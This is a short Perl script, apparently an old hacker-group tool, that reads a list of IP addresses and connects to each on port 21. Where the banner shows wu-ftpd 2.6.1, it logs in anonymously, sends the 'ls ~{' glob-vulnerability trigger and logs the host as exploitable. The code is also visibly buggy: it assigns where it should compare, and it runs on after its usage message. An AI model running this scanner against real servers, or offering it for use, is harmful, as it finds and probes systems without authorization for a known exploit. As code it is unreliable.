#!/usr/bin/perl
###########################################################################################
# Anonymous ftp scanner
#
# Checks for wuftpd2.6.1 glob vulnerability via anonymous login.
#
# By di0aD - di0ad@mail.com - di0ad@twlc.net                                              
#
# Greetz - deep magic, twlc, b10z, d0tslash, DataThief, messiah, aempirei, Mixter, phased 
###########################################################################################
use Socket;

print"Anonymous ftp scan v1.0 - di0aD\n";
if (@ARGV < 2) { print"Usage: [Input.log] - [Output.log] - [Timeout in seconds]\n"; }

$ip = $ARGV[0];
$log = $ARGV[1];
chomp;
$port = 21;
$timeout = $ARGV[2];
chomp();
open(IP,"$ip");
while (<IP>) {
open(LOG,">>$log");
alarm $timeout;
$host = $_;
chomp($host);
$SIG{"ALRM"} = sub { close(S); };
print "$host:$port $banner\n";
socket(S,PF_INET,SOCK_STREAM,0);
my $iaddr = inet_aton($host);
my $paddr  = sockaddr_in($port, $iaddr);
if (connect (S, $paddr)) {
recv(S, $banner, 256,0 );
if ($banner =~ /2.6.1/) { 
send(S, "anonymous\n", 0 );
send(S, "got-root\@twlc.net\n", 0 );
send(S, "ls ~{\n", 0 );
recv(S, $disc, 256, 0 );
if($disc = 421) {
print LOG "$_";
close(IP);
close(LOG);
} else {
close S; }
}
} 
	}